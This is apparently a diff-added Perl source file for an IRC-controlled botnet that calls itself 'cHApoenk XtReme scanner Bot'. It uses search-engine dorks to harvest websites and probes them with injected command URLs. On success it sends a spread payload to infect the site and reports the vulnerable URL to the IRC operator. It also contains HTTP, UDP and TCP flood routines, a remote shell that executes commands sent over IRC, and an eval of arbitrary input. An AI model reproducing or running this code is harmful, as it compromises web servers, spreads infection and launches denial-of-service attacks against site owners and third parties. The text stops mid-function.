+my $response=$ua->request($reqz); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### FireBall +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @fireball=fireball($dork); +push(my @tot, @fireball); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+FireBall4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+FireBall4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### UOL +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @ulist=&uol($dork); +push(my @tot, @ulist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+UOL4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+UOL4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### ALTAVISTA +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @alist=&altavista($dork); + my @ablist=&altavistade($dork); + my @aclist=&altavistaus($dork); +push(my @tot, @alist,@ablist,@aclist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Altavista4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Altavista4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### HOTBOT +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @hlist=&hotbot($dork); +push(my @tot, @hlist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+HotBot4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+HotBot4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### MAMMA +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @malist=&mamma($dork); +push(my @tot, @malist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Mamma4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Mamma4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### MOZBOT +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @mozlist=&mozbot($dork); +push(my @tot, @mozlist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MozBot4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MozBot4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################### +#End of EXTREMEscanNER# +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# HTTPFlood # +# # +###################### +if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Attacking 4 ".$1." on port 80 for 4 ".$2." seconds ."); +my $itime = time; +my ($cur_time); +$cur_time = time - $itime; +while ($2>$cur_time){ +$cur_time = time - $itime; +my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); +print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; +close($socket); +} +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Attacking done 4 ".$1."."); +} +###################### +# End of HTTPFlood # +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# UDPFlood # +# # +###################### +if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Attacking4 ".$1." with 4 ".$2." Kb Packets for 4 ".$3." seconds."); +my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); +$dtime = 1 if $dtime == 0; +my %bytes; +$bytes{igmp} = $2 * $pacotes{igmp}; +$bytes{icmp} = $2 * $pacotes{icmp}; +$bytes{o} = $2 * $pacotes{o}; +$bytes{udp} = $2 * $pacotes{udp}; +$bytes{tcp} = $2 * $pacotes{tcp}; +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Results4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in4 ".$dtime." seconds to4 ".$1."."); +} +exit; +} +} +###################### +# End of Udpflood # +# # +###################### + + +sub ircase { +my ($kem, $printl, $case) = @_; + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } +if ($case =~ /^rejoin\s+(.*)/) { +my $chan = $1; +if ($chan =~ /^(\d+) (.*)/) { +for (my $ca = 1; $ca <= $1; $ca++ ) { +p("$2"); +j("$2"); +} +} +else { +p("$chan"); +j("$chan"); +} +} + +if ($case =~ /^op/) { +op("$printl", "$kem") if $case eq "op"; +my $oarg = substr($case, 3); +op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); +} + +if ($case =~ /^deop/) { +deop("$printl", "$kem") if $case eq "deop"; +my $oarg = substr($case, 5); +deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); +} + +if ($case =~ /^msg\s+(\S+) (.*)/) { +msg("$1", "$2"); +} + +if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { +for (my $cf = 1; $cf <= $1; $cf++) { +msg("$2", "$3"); +} +} + +if ($case =~ /^ctcp\s+(\S+) (.*)/) { +ctcp("$1", "$2"); +} + +if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { +for (my $cf = 1; $cf <= $1; $cf++) { +ctcp("$2", "$3"); +} +} + +if ($case =~ /^nick (.*)/) { +nick("$1"); +} + +if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { +conectar("$2", "$1", 6667); +} + +if ($case =~ /^raw (.*)/) { +sendraw("$1"); +} + +if ($case =~ /^eval (.*)/) { +eval "$1"; +} +} + + +sub shell { +my $printl=$_[0]; +my $comando=$_[1]; +if ($comando =~ /cd (.*)/) { +chdir("$1") || msg("$printl", "No such file or directory"); +return; +} + +elsif ($pid = fork) { +waitpid($pid, 0); +} +else { +if (fork) { +exit; + +} else { +my @resp=`$comando 2>&1 3>&1`; +my $c=0; +foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } +} +exit; +} +} +} + +sub tcpflooder { +my $itime = time; +my ($cur_time); +my ($ia,$pa,$proto,$j,$l,$t); +$ia=inet_aton($_[0]); +$pa=sockaddr_in($_[1],$ia); +$ftime=$_[2]; +$proto=getprotobyname('tcp'); +$j=0;$l=0; +$cur_time = time - $itime; +while ($l<1000){ +$cur_time = time - $itime; +last if $cur_time >= $ftime; +$t="SOCK$l"; +socket($t,PF_INET,SOCK_STREAM,$proto); +connect($t,$pa)||$j--; +$j++;$l++; +} +$l=0; +while ($l<1000){ +$cur_time = time - $itime; +last if $cur_time >= $ftime; +$t="SOCK$l"; +shutdown($t,2); +$l++; +} +} + +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% + +sub udpflooder { +my $iaddr = inet_aton($_[0]); +my $msg = 'A' x $_[1]; +my $ftime = $_[2]; +my $cp = 0; +my (%pacotes); +$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; +socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; +socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; +socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; +socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; +return(undef) if $cp == 4; +my $itime = time; +my ($cur_time); +while ( 1 ) { +for (my $porta = 1; +$porta <= 65000; $porta++) { +$cur_time = time - $itime; +last if $cur_time >= $ftime; +send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; +send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; +send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; +send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + +for (my $pc = 3; +$pc <= 255;$pc++) { +next if $pc == 6; +$cur_time = time - $itime; +last if $cur_time >= $ftime; +socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; +send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; +} +} +last if $cur_time >= $ftime; +} +return($cur_time, %pacotes); +} + +sub ctcp { +return unless $#_ == 1; +sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} + +sub msg { +return unless $#_ == 1; +sendraw("PRIVMSG $_[0] :$_[1]"); +} + +sub notice { +return unless $#_ == 1; +sendraw("NOTICE $_[0] :$_[1]"); +} + +sub op { +return unless $#_ == 1; +sendraw("MODE $_[0] +o $_[1]"); +} + +sub deop { +return unless $#_ == 1; +sendraw("MODE $_[0] -o $_[1]"); +} + +sub j { +&join(@_); +} + +sub join { +return unless $#_ == 0; +sendraw("JOIN $_[0]"); + +} +sub p { part(@_); +} + +sub part { +sendraw("PART $_[0]"); +} + +sub nick { +return unless $#_ == 0; +sendraw("NICK $_[0]"); +} + +sub quit { +sendraw("QUIT :$_[0]"); +} + +##### +# SUBS GOOGLE +##### +sub googlet { +my @dominios = ("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk"); +my @country = ("AE","AR","AT","AU","BE","BR","CA","CH","CL","DE","DK"); +my @lang = ("en","es","de","nl","pt-BR","it","de","fo","sv","fr","el"); +my @lst; +my $key=key($_[0]); +my $c=0; +foreach my $i (@dominios){ +my @lista = google($i,$key,$lang[$c],$country[$c]); +push(@lst,@lista); +$c++; +} +return @lst; +} + +sub google(){ +my @lst; +my $i=$_[0]; +my $key=$_[1]; +my $lang= $_[2]; +my $country =$_[3]; +for($b=0;$b<=5000;$b+=100){ +my $Go=("www.google.".$i."/search?hl=".$lang."&q=".key($key)."&num=100&start=".$b."&meta=cr%3Dcountry".$country); +my $Res=query($Go); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /google/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS AllTheWeb +##### + +sub allthewebt { +my @lang = ("en","es","de","nl","pt-BR","it","de","fo"); +my @lst; +my $key=key($_[0]); +my $c=0; +foreach my $lang (@lang){ +my @lista = alltheweb($key,$lang[$c]); +push(@lst,@lista); +$c++; +} +return @lst; +} + + +sub alltheweb(){ +my @lista; +my $key = $_[0]; +my $lang= $_[1]; +for($b=0;$b<=500;$b+=100){ +my $alltheweb=("http://www.alltheweb.com/search?cat=web&_sb_lang=".$lang."&hits=100&q=".key($key)."&o=".$b); +my $Res=query($alltheweb); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub standard() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=100) +{ +my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); +my $Res=query($all); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS Lycos +##### +sub lycos(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $ly=("http://search.lycos.com/?query=".key($key)."&page=$av".$b); +my $Res=query($ly); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS Yahoo +##### +sub yahoo(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=100){ +my $Ya=("http://br.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahooa(){ +my @lst; +my $key = $_[0]; +for($b=210;$b<=1000;$b+=210){ +my $Ya=("http://be.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahoob(){ +my @lst; +my $key = $_[0]; +for($b=410;$b<=1000;$b+=210){ +my $Ya=("http://us.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahooc(){ +my @lst; +my $key = $_[0]; +for($b=610;$b<=1000;$b+=210){ +my $Ya=("http://it.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahood(){ +my @lst; +my $key = $_[0]; +for($b=810;$b<=1000;$b+=210){ +my $Ya=("http://de.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS MSN +##### +sub msn(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE"); +my $Res=query($MsN); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if($1 !~ /msn|live/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS SEARCH +##### +sub search(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $ser=("http://www.search.com/search?q=".key($key)."".$b); +my $Res=query($ser); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS FireBall +##### +sub fireball(){ +my $key=$_[0]; +my $inizio=1; +my $pagine=200; +my @lst; +my $av=0; +while($inizio <= $pagine){ +my $fireball="http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=fb_loc&idx=all&enc=utf-8"; +my $Res=query($fireball); +while ($Res=~ m/<a href=\"?http:\/\/(.+?)\//g ){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k="$1/"; +my @grep=links($k); +push(@lst,@grep); +}} +$av=$av+10; +$inizio++; +} +return @lst; +} + +##### +# SUBS UOL +##### +sub uol(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i); +my $Res=query($UoL); +while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){ +my $k=$1; +if($k!~/busca|uol|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# Altavista +##### +sub altavista(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub altavistade(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://de.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub altavistaus(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://us.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# HotBot +##### +sub hotbot(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $hot=("http://search.hotbot.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b); +my $Res=query($hot); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + + +##### +# Mamma +##### +sub mamma(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $mam=("http://www.mamma.com/Mamma?utfout=$av&qtype=0&query=".key($key)."".$b); +my $Res=query($mam); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# MozBot +##### +sub mozbot() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=100; $i+=1){ +my $mozbot=("http://www.mozbot.fr/search?q=".key($key)."&st=int&page=".$i); +my $Res=query($mozbot); +while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); 